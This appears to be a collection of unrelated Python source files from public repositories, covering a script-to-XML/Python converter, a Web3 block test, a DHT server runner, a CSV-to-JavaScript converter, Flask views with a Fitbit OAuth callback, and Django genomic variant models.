name_is_first_id = True
debug_other = False
class ListNamedObject(TagObject):
name_is_first_id = True
set_child_argn = False
debug_other = False
class TypedObject(ListObject):
type_arg = 0
def add_other(self, argn, vtype, value):
if argn == self.type_arg:
self.xml.set("type", vtype)
class Source(ListObject):
tags = ["source", "basicsource", "classdeclarationsource",
"statement_list", "statement_block"]
adopt_childs_tags = ['source_element',
'statement_list', 'statement', "statement_block"]
class Identifier(NamedObject):
tags = ["identifier", "optid"]
def polish(self):
if self.xmlname is None:
self.astname = "empty"
return self
class Arguments(ListObject):
tags = ["arglist"]
adopt_childs_tags = ['vardecl_list']
class VariableType(NamedObject):
tags = ["optvartype"]
def polish(self):
if self.xmlname is None:
self.astname = "empty"
return self
class ExtendsType(NamedObject):
tags = ["optextends"]
def polish(self):
if self.xmlname is None:
self.astname = "empty"
return self
class Function(ListNamedObject):
tags = ["funcdeclaration"]
callback_subelem = ListNamedObject.callback_subelem.copy()
callback_subelem[VariableType] = "add_vartype"
def add_vartype(self, argn, subelem):
self.xml.set("returns", str(subelem.xmlname))
class FunctionAnon(ListObject):
tags = ["funcdeclaration_anon"]
class FunctionAnonExec(ListObject):
tags = ["funcdeclaration_anon_exec"]
class Variable(NamedObject):
tags = ["vardecl"]
callback_subelem = NamedObject.callback_subelem.copy()
callback_subelem[VariableType] = "add_vartype"
def add_vartype(self, argn, subelem):
self.xml.set("type", str(subelem.xmlname))
class DeclarationBlock(ListObject):
tags = ["vardeclaration"]
adopt_childs_tags = ['vardecl_list']
def add_other(self, argn, vtype, value):
if argn == 0:
self.xml.set("mode", vtype)
def polish(self):
# if len(self.values) == 0 and len(self.subelems) == 1:
# self.subelems[0].xml.set("mode",self.xml.get("mode"))
# return self.subelems[0]
return self
class Class(ListNamedObject):
tags = ["classdeclaration"]
callback_subelem = ListNamedObject.callback_subelem.copy()
callback_subelem[ExtendsType] = "add_exttype"
def add_exttype(self, argn, subelem):
self.xml.set("extends", str(subelem.xmlname))
class Member(TagObject):
debug_other = False
set_child_argn = False
tags = ["member_var", "member_call"]
adopt_childs_tags = ['varmemcall', "member_var", "member_call"]
class ArrayMember(TagObject):
debug_other = False
set_child_argn = False
tags = ["array_member"]
adopt_childs_tags = ['variable_1', "func_call"]
class InstructionCall(TagObject):
debug_other = False
tags = ["callinstruction"]
class InstructionStore(TagObject):
promote_child_if_alone = True
debug_other = False
tags = ["storeinstruction"]
class InstructionFlow(TypedObject):
debug_other = True
tags = ["flowinstruction"]
class Instruction(TagObject):
promote_child_if_alone = True
debug_other = False
tags = ["instruction"]
class OpMath(TypedObject):
debug_other = True
tags = ["mathoperator"]
class Compare(TypedObject):
debug_other = True
tags = ["cmp_symbol", "boolcmp_symbol"]
class FunctionCall(NamedObject):
tags = ["funccall_1"]
class CallArguments(ListObject):
tags = ["callargs"]
class Constant(ListObject):
tags = ["constant"]
def add_value(self, argn, vtype, value):
value = str(value) # str(value,"ISO-8859-15","replace")
if vtype == "SCONST":
vtype = "String"
value = value[1:-1]
self.xml.set("delim", '"')
if vtype == "CCONST":
vtype = "String"
value = value[1:-1]
self.xml.set("delim", "'")
if vtype == "RCONST":
vtype = "Regex"
if vtype == "ICONST":
vtype = "Number"
if vtype == "FCONST":
vtype = "Number"
self.const_value = value
self.const_type = vtype
self.xml.set("type", vtype)
self.xml.set("value", value)
class InlineUpdate(ListObject):
tags = ["inlinestoreinstruction"]
def add_other(self, argn, vtype, value):
self.xml.set("type", vtype)
if argn == 0:
self.xml.set("mode", "update-read")
if argn == 1:
self.xml.set("mode", "read-update")
class If(ListObject):
tags = ["ifstatement"]
class Condition(ListObject):
tags = ["condition"]
class Else(ListObject):
tags = ["optelse"]
def polish(self):
if len(self.subelems) == 0:
self.astname = "empty"
return self
class DictObject(ListObject):
tags = ["dictobject_value_elemlist", "dictobject_value"]
adopt_childs_tags = ['dictobject_value_elemlist', "dictobject_value"]
class DictElem(ListObject):
tags = ["dictobject_value_elem"]
class ExpressionContainer(ListObject):
tags = ["expression"]
# adopt_childs_tags = ['base_expression']
def polish(self):
if len(self.values) == 0 and len(self.subelems) == 1:
# if isinstance(self.subelems[0], Constant):
if self.subelems[0].xml.tag == "base_expression":
self.subelems[0].xml.tag = "Expression"
return self.subelems[0]
else:
self.xml.tag = "Value"
return self
class InstructionUpdate(ListObject):
tags = ["updateinstruction"]
class Switch(ListObject):
tags = ["switch"]
adopt_childs_tags = ['case_cblock_list', 'case_block_list']
class CaseList(ListObject):
tags = ["case_block_list"]
adopt_childs_tags = ['case_cblock_list', 'case_block_list']
class Case(ListObject):
tags = ["case_block"]
class CaseDefault(ListObject):
tags = ["case_default"]
class While(ListObject):
tags = ["whilestatement"]
class For(ListObject):
tags = ["forstatement"]
class ForInitialize(ListObject):
tags = ["for_initialize"]
class ForCompare(ListObject):
tags = ["for_compare"]
class ForIncrement(ListObject):
tags = ["for_increment"]
class DoWhile(ListObject):
tags = ["dowhilestatement"]
class ForIn(ListObject):
tags = ["forinstatement"]
class With(ListObject):
tags = ["withstatement"]
class TryCatch(ListObject):
tags = ["trycatch"]
class New(ListObject):
tags = ["new_operator"]
class Delete(ListObject):
tags = ["deleteinstruction"]
class Parentheses(ListObject):
tags = ["parentheses"]
adopt_childs_tags = ['base_expression']
class OpUnary(TypedObject):
tags = ["unary_operator"]
class OpTernary(ListObject):
tags = ["ternary_operator"]
class OpUpdate(TypedObject):
tags = ["updateoperator"]
# ----- keep this one at the end.
class Unknown(TagObject):
promote_child_if_alone = True
set_child_argn = False
@classmethod
def tagname(self, tagname):
return tagname
@classmethod
def can_process_tag(self, tagname):
return True
# -----------------
def create_xml(tagname):
classobj = None
for cls in xml_class_types:
if cls.can_process_tag(tagname):
classobj = cls
break
if classobj is None:
return None
return classobj(tagname)
def parse_unknown(tagname, treedata):
xmlelem = create_xml(tagname)
i = 0
for k, v in treedata['content']:
if type(v) is dict:
instruction = parse(k, v)
xmlelem.add_subelem(i, instruction)
elif k in USEFUL_TOKENS:
xmlelem.add_value(i, k, v)
else:
xmlelem.add_other(i, k, v)
i += 1
return xmlelem.polish()
def post_parse(treedata):
source = parse("source", treedata)
# print UNKNOWN_PARSERS.keys()
return source.xml
class Module(object):
def __init__(self, name, path):
self.name = name
self.path = path
def loadModule(self):
fp = None
try:
description = ('.py', 'U', imp.PY_SOURCE)
# description = ('.pyc', 'U', PY_COMPILED)
pathname = os.path.join(self.path, self.name)
fp = open(pathname)
name = self.name[:self.name.find(".")]
# fp, pathname, description = imp.find_module(self.name,[self.path])
self.module = imp.load_module(name, fp, pathname, description)
result = True
except FileNotFoundError:
print("Fichero %r no encontrado" % self.name)
result = False
except Exception as e:
print(traceback.format_exc())
result = False
if fp:
fp.close()
return result
def parseArgs(argv):
parser = OptionParser()
parser.add_option("-q", "--quiet",
action="store_false", dest="verbose", default=True,
help="don't print status messages to stdout")
parser.add_option("--optdebug",
action="store_true", dest="optdebug", default=False,
help="debug optparse module")
parser.add_option("--debug",
action="store_true", dest="debug", default=False,
help="prints lots of useless messages")
parser.add_option("--path",
dest="storepath", default=None,
help="store XML results in PATH")
parser.add_option("--topython",
action="store_true", dest="topython", default=False,
help="write python file from xml")
parser.add_option("--exec-py",
action="store_true", dest="exec_python", default=False,
help="try to execute python file")
parser.add_option("--toxml",
action="store_true", dest="toxml", default=False,
help="write xml file from qs")
parser.add_option("--full",
action="store_true", dest="full", default=False,
help="write xml file from qs")
parser.add_option("--cache",
action="store_true", dest="cache", default=False,
help="If dest file exists, don't regenerate it")
(options, args) = parser.parse_args(argv)
return (options, args)
def main():
options, args = parseArgs(sys.argv[1:])
execute(options, args)
def pythonify(filelist):
options, args = parseArgs([])
options.full = True
if isinstance(filelist, str):
filelist = [filelist]
execute(options, filelist)
print(filelist)
def execute(options, args):
if options.optdebug:
print(options, args)
if options.full:
execpython = options.exec_python
options.exec_python = False
options.full = False
options.toxml = True
if options.verbose:
print("Pass 1 - Parse and write XML file . . .")
try:
execute(options, args)
except Exception:
print("Error parseando:")
print(traceback.format_exc())
options.toxml = False
options.topython = True
if options.verbose:
print("Pass 2 - Pythonize and write PY file . . .")
try:
execute(options, [arg + ".xml" for arg in args])
except Exception:
print("Error convirtiendo:")
print(traceback.format_exc())
if execpython:
options.exec_python = execpython
if options.verbose:
print("Pass 3 - Test PY file load . . .")
options.topython = False
try:
execute(
options, [(arg + ".xml.py").replace(".qs.xml.py", ".qs.py") for arg in args])
except Exception:
print("Error al ejecutar Python:")
print(traceback.format_exc())
print("Done.")
elif options.exec_python:
# import qsatype
for filename in args:
realpath = os.path.realpath(filename)
path, name = os.path.split(realpath)
if not os.path.exists(realpath):
print("Fichero no existe: %s" % name)
continue
mod = Module(name, path)
if not mod.loadModule():
print("Error cargando modulo %s" % name)
elif options.topython:
from .pytnyzer import pythonize
import io
if options.cache:
args = [x for x in args if not os.path.exists((x + ".py").replace(".qs.xml.py", ".qs.py")) or
os.path.getmtime(x) > os.path.getctime((x + ".py").replace(".qs.xml.py", ".qs.py"))]
nfs = len(args)
for nf, filename in enumerate(args):
bname = os.path.basename(filename)
if options.storepath:
destname = os.path.join(options.storepath, bname + ".py")
else:
destname = filename + ".py"
destname = destname.replace(".qs.xml.py", ".qs.py")
if not os.path.exists(filename):
print("Fichero %r no encontrado" % filename)
continue
if options.verbose:
sys.stdout.write(
"Pythonizing File: %-35s . . . . (%.1f%%) \r" % (bname, 100.0 * (nf + 1.0) / nfs))
if options.verbose:
sys.stdout.flush()
old_stderr = sys.stdout
stream = io.StringIO()
sys.stdout = stream
try:
pythonize(filename, destname, destname + ".debug")
except Exception:
print("Error al pythonificar %r:" % filename)
print(traceback.format_exc())
sys.stdout = old_stderr
text = stream.getvalue()
if len(text) > 2:
print("%s: " % bname + ("\n%s: " %
bname).join(text.splitlines()))
else:
if options.cache:
args = [x for x in args if not os.path.exists(x + ".xml") or
os.path.getmtime(x) > os.path.getctime(x + ".xml")]
nfs = len(args)
for nf, filename in enumerate(args):
bname = os.path.basename(filename)
if options.verbose:
sys.stdout.write(
"Parsing File: %-35s . . . . (%.1f%%) " % (bname, 100.0 * (nf + 1.0) / nfs))
if options.verbose:
sys.stdout.flush()
try:
filecontent = open(filename, "r", encoding="latin-1").read()
filecontent = flscriptparse.cleanNoPython(filecontent)
except Exception as e:
print("Error: No se pudo abrir fichero %-35s \n" %
(repr(filename)), e)
continue
prog = flscriptparse.parse(filecontent)
sys.stdout.write("\r")
if not prog:
print("Error: No se pudo abrir %-35s \n" %
(repr(filename)))
continue
if prog["error_count"] > 0:
print("Encontramos %d errores parseando: %-35s \n" %
(prog["error_count"], repr(filename)))
continue
if not options.toxml:
# Si no se quiere guardar resultado, no hace falta calcular mas
continue
tree_data = None
try:
tree_data = flscriptparse.calctree(prog, alias_mode=0)
except Exception:
print("Error al convertir a XML %r:" % bname)
print("\n".join(traceback.format_exc().splitlines()[-7:]))
if not tree_data:
print("No se pudo parsear %-35s \n" %
(repr(filename)))
continue
ast = post_parse(tree_data)
if ast is None:
print("No se pudo analizar %-35s \n" %
(repr(filename)))
continue
if options.storepath:
destname = os.path.join(options.storepath, bname + ".xml")
else:
destname = filename + ".xml"
f1 = open(destname, "wb")
f1.write(etree.tostring(ast, pretty_print=True))
f1.close()
if __name__ == "__main__":
main()
| 2.296875 | 2 |
src/libs/Web3Client/tests/testGetBlock.py | JorgePadilla/crabada.py | 0 | 12796590 | <gh_stars>0
from src.common.config import nodeUri
from src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client
from pprint import pprint
from src.libs.Web3Client.helpers.debug import pprintAttributeDict
# VARS
client = AvalancheCWeb3Client(nodeUri=nodeUri)
# TEST FUNCTIONS
def test() -> None:
print(">>> LATEST BLOCK")
pprintAttributeDict(client.w3.eth.get_block("latest"))
print(">>> PENDING BLOCK")
pprintAttributeDict(client.w3.eth.get_block("pending"))
# EXECUTE
test()
| 1.835938 | 2 |
runserver.py | pipelinedb/pipelinedht | 15 | 12796591 | #!/usr/bin/env python
from argparse import ArgumentParser
from dht.server import app
if __name__ == '__main__':
parser = ArgumentParser(
description='PiplineDHT -- A simple distributed hash table')
parser.add_argument('-n', '--name', action='store', required=True,
help='name of node')
parser.add_argument('-k', '--host', action='store', default='localhost',
help='hostname to bind to')
parser.add_argument('-p', '--port', action='store', type=int,
required=True, help='port to bind to')
args = parser.parse_args()
app.run(host=args.host, port=args.port)
| 2.625 | 3 |
misc/ConvertOrdersCSVtoJS.py | celstark/MSTonline | 1 | 12796592 | <filename>misc/ConvertOrdersCSVtoJS.py
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 1 17:05:31 2020
@author: craig
We've been using some online order files in our original PsychoPy-derived
web-based MST. This converts those actual .csv files into the .js ones
we'll be using here
"""
import os, csv, glob
inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders')
outpath=os.path.join("C:",os.sep,"Users","craig","OneDrive - University of California - Irvine","Documents","cordova_cMST","www","jsOrders")
studyfiles=glob.glob(os.path.join(inpath,"MST*p1_o*csv"))
testfiles=glob.glob(os.path.join(inpath,"MST*p2_o*csv"))
for fname in studyfiles:
print(fname)
stim=[]
cond=[]
with open(fname,"r") as infile:
reader=csv.reader(infile,delimiter=',')
next(reader)
for row in reader:
stim.append(row[0])
cond.append(row[1])
infile.close()
outfname=fname.replace('csv','js').replace(inpath,outpath)
outfile=open(outfname,"w")
outfile.write('var trial_stim=[\n')
for i in range(len(cond)):
outfile.write(' {' + "stim: '{0}', cond: '{1}'".format(stim[i],cond[i]) + '}')
if i < (len(cond)-1):
outfile.write(',\n')
else:
outfile.write('\n')
outfile.write(']\n')
outfile.close()
for fname in testfiles:
print(fname)
stim=[]
cond=[]
lbin=[]
corr3=[]
corr2=[]
with open(fname,"r") as infile:
reader=csv.reader(infile,delimiter=',')
next(reader)
for row in reader:
stim.append(row[0])
cond.append(row[1])
lbin.append(row[2])
if row[3]=='v':
corr3.append('0')
corr2.append('0')
elif row[3]=='b':
corr3.append('1')
corr2.append('2')
elif row[3]=='n':
corr3.append('2')
corr2.append('2')
else:
corr3.append('-1')
corr2.append('-1')
infile.close()
outfname=fname.replace('csv','js').replace(inpath,outpath)
outfile=open(outfname,"w")
outfile.write('var trial_stim=[\n')
for i in range(len(cond)):
outfile.write(' {' + "stim: '{0}', cond: '{1}', lbin: {2}, corr3: {3}, corr2: {4}".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}')
if i < (len(cond)-1):
outfile.write(',\n')
else:
outfile.write('\n')
outfile.write(']\n')
outfile.close()
| 2.265625 | 2 |
poketrainer/views.py | hinnefe2/poketrainer | 0 | 12796593 | <gh_stars>0
import base64
import logging
import requests
from flask import redirect, render_template, request, session
from requests_oauthlib import OAuth2Session
from poketrainer.app import flask_app
from poketrainer.api.syncs.fitbit import _generate_fitbit_token, \
FITBIT_CALLBACK_URI
LOGGER = logging.getLogger(__name__)
@flask_app.route('/ui/collection/')
def collection():
pokemon = requests.get(request.host_url + 'api/collection').json()
return render_template('collection.html', pokemon=pokemon)
@flask_app.route('/ui/team/')
def team():
pokemon = requests.get(request.host_url + 'api/team').json()
return render_template('collection.html', pokemon=pokemon)
@flask_app.route('/fitbit_login/')
def fitbit_login():
return _generate_fitbit_token()
@flask_app.route('/fitbitCallback')
def fitbit_callback():
id_secret = (f'{flask_app.config["FITBIT_CLIENT_ID"]}:'
f'{flask_app.config["FITBIT_CLIENT_SECRET"]}')
# see https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens # noqa
# for why we have to do this base64 stuff
b64_creds = (base64.encodebytes(bytes(id_secret, 'utf8'))
.decode('utf8')
.rstrip())
auth_header = {'Authorization': f'Basic {b64_creds}',
'Content-Type': 'application/x-www-form-urlencoded'}
post_params = {'grant_type': 'authorization_code',
'code': request.args.get('code'),
'redirect_uri': request.host_url + FITBIT_CALLBACK_URI}
# request the actual access token
token = requests.post('https://api.fitbit.com/oauth2/token',
headers=auth_header, params=post_params).json()
LOGGER.debug(token)
# for some reason this fails with 'Missing access token'
# c.f. https://github.com/requests/requests-oauthlib/issues/324
# oauth = OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'],
# redirect_uri=request.host_url + '/fitbitCallback/',
# scope=['activity'])
# token = oauth.fetch_token(
# token_url='https://api.fitbit.com/oauth2/token',
# authorization_response=request.url,
# include_client_id=True,
# client_secret=flask_app.config['FITBIT_CLIENT_SECRET'])
session.update(
FITBIT_REFRESH_TOKEN=token['refresh_token'])
return redirect('/ui/collection/')
| 2.234375 | 2 |
snpdb/models/models_variant.py | SACGF/variantgrid | 5 | 12796594 | import collections
import logging
import re
from typing import Optional, Pattern, Tuple, Iterable, Set
import django.dispatch
from django.conf import settings
from django.contrib.auth.models import User
from django.db import models, IntegrityError
from django.db.models import Value as V, QuerySet, F
from django.db.models.deletion import CASCADE, DO_NOTHING
from django.db.models.fields import TextField
from django.db.models.functions import Greatest
from django.db.models.functions.text import Concat
from django.db.models.query_utils import Q, FilteredRelation
from django.dispatch import receiver
from django.urls.base import reverse
from django_extensions.db.models import TimeStampedModel
from lazy import lazy
from model_utils.managers import InheritanceManager
from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos
from flags.models.models import FlagsMixin, FlagTypeContext
from library.django_utils.django_partition import RelatedModelsPartitionModel
from library.genomics import format_chrom
from library.utils import md5sum_str
from snpdb.models import Wiki
from snpdb.models.flag_types import allele_flag_types
from snpdb.models.models_clingen_allele import ClinGenAllele
from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus
from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig
LOCUS_PATTERN = re.compile(r"^([^:]+):(\d+)[,\s]*([GATC]+)$", re.IGNORECASE)
LOCUS_NO_REF_PATTERN = r"^([^:]+):(\d+)$"
VARIANT_PATTERN = re.compile(r"^([^:]+):(\d+)[,\s]*([GATC]+)>(=|[GATC]+)$", re.IGNORECASE)
allele_validate_signal = django.dispatch.Signal(providing_args=["allele"])
class Allele(FlagsMixin, models.Model):
""" Genome build independent - ie GRCh37 and GRCh38 variants for same change point to same allele
This is generally done via ClinGen Allele Registry, but sometimes that can fail.
Linked against Variant with VariantAllele below """
clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE)
def get_absolute_url(self):
# will show allele if there is one, otherwise go to variant page
return reverse('view_allele', kwargs={"pk": self.id})
def flag_type_context(self) -> FlagTypeContext:
return FlagTypeContext.objects.get(pk="allele")
@lazy
def clingen_error(self):
error = None
if va := self.variantallele_set.filter(error__isnull=False).first():
error = va.error
return error
def variant_alleles(self):
return self.variantallele_set.order_by("genome_build__name")
@lazy
def grch37(self) -> Optional['Variant']:
try:
return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False)
except ValueError:
return None
@lazy
def grch38(self) -> Optional['Variant']:
try:
return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False)
except ValueError:
return None
@lazy
def variants(self):
return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True))
def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant':
vas = self.variant_alleles()
va = None
if genome_build:
va = vas.filter(genome_build=genome_build).first()
if not va and not best_attempt:
raise ValueError(f'Could not find a variant in allele {self.id} for build {genome_build}')
if not va:
va = vas.first()
if va:
return va.variant
raise ValueError(f'Could not find any variants in allele {self.id}')
def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']:
""" Used by to write VCF coordinates during liftover. Can be slow (API call)
If you know a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() """
from snpdb.models.models_dbsnp import DbSNP
from genes.hgvs import get_hgvs_variant_tuple
# Check if the other build shares existing contig
genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values())
for variant_allele in self.variantallele_set.all():
if variant_allele.variant.locus.contig_id in genome_build_contigs:
conversion_tool = AlleleConversionTool.SAME_CONTIG
variant_tuple = variant_allele.variant.as_tuple()
return conversion_tool, variant_tuple
conversion_tool = None
g_hgvs = None
if self.clingen_allele:
try:
g_hgvs = self.clingen_allele.get_g_hgvs(genome_build)
conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY
except ValueError: # Various contig errors all subclass from this
pass
if g_hgvs is None:
if settings.LIFTOVER_DBSNP_ENABLED:
va = self.variantallele_set.all().first()
if va is None:
raise ValueError("Allele contains no VariantAlleles at all! Cannot liftover")
dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version)
if dbsnp:
g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt)
conversion_tool = AlleleConversionTool.DBSNP
variant_tuple = None
if g_hgvs:
variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build)
return conversion_tool, variant_tuple
def merge(self, conversion_tool, other_allele: "Allele") -> bool:
""" Merge other_allele into this allele """
if self == other_allele:
raise ValueError(f"Attempt to merge {self} to itself!")
can_merge = True
merge_log_message = f"{other_allele} merge into {self}"
other_clingen_allele = other_allele.clingen_allele
if other_clingen_allele and self.clingen_allele:
can_merge = False
merge_log_message = f"Error performing {merge_log_message}: both have ClinGen Alleles!"
AlleleMergeLog.objects.create(old_allele=other_allele,
new_allele=self,
conversion_tool=conversion_tool,
success=can_merge,
message=merge_log_message)
if can_merge:
if other_clingen_allele:
# Move across ClinGen Allele (may not have been possible to retrieve in all builds, but at least one
# links there, and can't have another, so it'll work)
other_allele.clingen_allele = None
other_allele.save()
self.clingen_allele = other_clingen_allele
self.save()
if other_fc := other_allele.flag_collection:
other_fc.flag_set.update(collection=self.flag_collection_safe)
other_fc.flagwatch_set.update(flag_collection=self.flag_collection)
existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list("name", flat=True)
other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection)
other_fc.classification_set.update(flag_collection=self.flag_collection)
existing_allele_cc_names = self.clinicalcontext_set.values_list("name", flat=True)
other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self)
for va in other_allele.variantallele_set.all():
try:
va.allele = self
va.conversion_tool = conversion_tool
va.save()
except IntegrityError:
logging.warning("VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one",
va.allele, va.genome_build, va.variant)
va.delete()
return can_merge
@property
def build_names(self) -> str:
return ", ".join(sorted(self.variantallele_set.values_list("genome_build__name", flat=True)))
def __str__(self):
name = f"Allele {self.pk}"
if self.clingen_allele:
name += f" ({self.clingen_allele})"
return name
def __format__(self, format_spec: str):
if format_spec == 'CA' and (cligen_allele := self.clingen_allele):
return str(cligen_allele)
else:
return f"Allele {self.pk}"
def validate(self, liftover_complete=True):
"""
:param liftover_complete: If False does not check for missing representations
"""
if liftover_complete:
v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first()
v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first()
if v37:
self.close_open_flags_of_type(allele_flag_types.missing_37)
else:
self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True)
if v38:
self.close_open_flags_of_type(allele_flag_types.missing_38)
else:
self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True)
allele_validate_signal.send(sender=Allele, allele=self)
@receiver(flag_collection_extra_info_signal, sender=FlagCollection)
def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument
alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids)
allele: Allele
for allele in alleles:
flag_infos.set_extra_info(allele.flag_collection_id, {
'label': f'Allele {allele.id}'
}, source_object=allele)
class AlleleMergeLog(TimeStampedModel):
""" Keep track of calls to Allele.merge() """
old_allele = models.ForeignKey(Allele, related_name="old_allele_merge", on_delete=CASCADE)
new_allele = models.ForeignKey(Allele, related_name="new_allele_merge", on_delete=CASCADE)
conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)
success = models.BooleanField(default=True)
message = models.TextField(null=True)
VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt')
class Sequence(models.Model):
"""
We want to guarantee seq is unique (so Locus/Variant can have unique constraints)
Postgres by default uses indexes for constraints, and large TextFields give error of:
"index row requires x bytes, maximum size is 8191"
The easiest solution is to md5sum seq and make the constraint on that. Another possible solution is to use
Gist indexes but that requires installing the btree_gist extension (requires postgres Admin rights).
Django 3 has ExclusionConstraint, Postgres contrib has BtreeGistExtension to add via migration
"""
seq = models.TextField()
seq_md5_hash = models.CharField(max_length=32, unique=True)
length = models.IntegerField()
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
if not self.seq_md5_hash:
self.seq_md5_hash = md5sum_str(self.seq)
super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields)
@staticmethod
def abbreviate(s: str, max_length: int = 20):
if len(s) > max_length:
s = f"{s[:3]}...{s[-3:]}"
return s
def __str__(self):
return self.abbreviate(self.seq)
@staticmethod
def get_pk_by_seq(q=None):
qs = Sequence.objects.all()
if q:
qs = qs.filter(q)
return dict(qs.values_list("seq", "pk"))
def is_standard_sequence(self):
""" only contains G/A/T/C/N """
return not re.match(r"[^GATCN]", self.seq)
class Locus(models.Model):
""" 1 per line in a VCF file (multiple Variants with different alt alleles point to the same locus)
There is only 1 Locus for a given chrom/position/ref per database (handled via insertion queues) """
contig = models.ForeignKey(Contig, on_delete=CASCADE)
position = models.IntegerField(db_index=True)
ref = models.ForeignKey(Sequence, on_delete=CASCADE)
class Meta:
unique_together = ("contig", "position", "ref")
@property
def chrom(self):
return self.contig.name
def __str__(self):
return f"{self.chrom}:{self.position} {self.ref}"
class Variant(models.Model):
""" Variants represent the different alleles at a locus
Usually 2+ per line in a VCF file (ref + >= 1 alts pointing to the same locus for the row)
There is only 1 Variant for a given locus/alt per database (handled via insertion queues) """
REFERENCE_ALT = "="
locus = models.ForeignKey(Locus, on_delete=CASCADE)
alt = models.ForeignKey(Sequence, on_delete=CASCADE)
class Meta:
unique_together = ("locus", "alt")
@staticmethod
def get_chrom_q(chrom):
return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom)
@staticmethod
def get_contigs_q(genome_build: GenomeBuild):
""" Restrict to contigs in a genome build """
return Q(locus__contig__genomebuildcontig__genome_build=genome_build)
@staticmethod
def get_no_reference_q():
return ~Q(alt__seq=Variant.REFERENCE_ALT)
@staticmethod
def get_overlap_annotate_and_q(contig, start, end):
""" Query handling indels. Contigs must match and variant.start <= end AND variant.end_position >= start """
annotation_kwargs = {"longest_sequence": Greatest("locus__ref__length", "alt__length"),
"end_position": F("locus__position") + F("longest_sequence")}
q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start)
return annotation_kwargs, q
@staticmethod
def annotate_variant_string(qs, name="variant_string", path_to_variant=""):
""" Return a "1:123321 G>C" style string in a query """
kwargs = {name: Concat(f"{path_to_variant}locus__contig__name", V(":"),
f"{path_to_variant}locus__position", V(" "),
f"{path_to_variant}locus__ref__seq", V(">"),
f"{path_to_variant}alt__seq", output_field=TextField())}
return qs.annotate(**kwargs)
@staticmethod
def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str:
if abbreviate:
ref = Sequence.abbreviate(ref)
alt = Sequence.abbreviate(alt)
return f"{chrom}:{position} {ref}>{alt}"
@staticmethod
def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild,
regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate:
""" regex_pattern - has to have 4 groups, returns (chrom, position, ref, alt) """
variant_tuple = None
if m := regex_pattern.match(variant_string):
chrom, position, ref, alt = m.groups()
chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt,
want_chr=genome_build.reference_fasta_has_chr)
contig = genome_build.chrom_contig_mappings[chrom]
variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt)
return variant_tuple
@staticmethod
def get_from_string(variant_string: str, genome_build: GenomeBuild,
regex_pattern=VARIANT_PATTERN) -> Optional['Variant']:
variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern)
try:
return Variant.get_from_tuple(variant_tuple, genome_build)
except Variant.DoesNotExist:
return None
@staticmethod
def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant':
params = ["locus__contig__name", "locus__position", "locus__ref__seq", "alt__seq"]
return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build,
**dict(zip(params, variant_tuple)))
@lazy
def genome_builds(self) -> Set['GenomeBuild']:
gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(),
contig__locus__variant=self)
return {gbc.genome_build for gbc in gbc_qs}
@lazy
def coordinate(self) -> VariantCoordinate:
locus = self.locus
contig = locus.contig
return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq)
@staticmethod
def is_ref_alt_reference(ref, alt):
return ref == alt or alt == '.'
@property
def is_reference(self) -> bool:
return self.alt.seq == self.REFERENCE_ALT
@property
def is_standard_variant(self) -> bool:
""" Variant alt sequence is standard [GATCN] (ie not special or reference) """
# locus.ref should always be standard...
return self.alt.is_standard_sequence()
@property
def is_indel(self) -> bool:
return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length
@property
def is_insertion(self) -> bool:
return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length
@property
def is_deletion(self) -> bool:
return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length
@property
def can_have_clingen_allele(self) -> bool:
